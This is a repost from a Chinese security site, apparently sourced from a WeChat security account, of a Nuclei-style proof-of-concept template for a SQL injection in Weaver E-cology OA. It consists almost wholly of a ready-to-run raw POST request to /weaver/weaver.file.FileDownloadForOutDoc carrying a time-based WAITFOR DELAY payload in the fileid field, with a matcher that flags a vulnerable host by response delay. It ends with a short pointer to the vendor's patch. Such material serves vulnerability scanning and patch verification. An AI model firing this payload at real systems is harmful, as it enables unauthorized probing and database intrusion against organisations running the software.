泛微 E-cology SQL注入漏洞 POC

admin 2023年7月14日12:01:51评论147 views字数 598阅读1分59秒阅读模式

泛微 E-cology SQL注入漏洞 POC


id: ecology-oa-filedownloadforoutdoc-sqli
info: name: EcologyOA filedownloadforoutdoc - SQL injection author: unknown severity: critical description: EcologyOA filedownloadforoutdoc interface has SQL injection tags: ecology-oa,sqli
requests: - raw: - | POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1 matchers: - type: dsl dsl: - 'duration>=5'


泛微 E-cology SQL注入漏洞 POC


官方修复方案

目前官方已发布安全补丁,建议受影响用户尽快将补丁版本升级至10.58及以上。
https://www.weaver.com.cn/cs/securityDownload.asp#


原文始发于微信公众号(Khan安全攻防实验室):泛微 E-cology SQL注入漏洞 POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月14日12:01:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微 E-cology SQL注入漏洞 POChttps://cn-sec.com/archives/1875586.html

发表评论

匿名网友 填写信息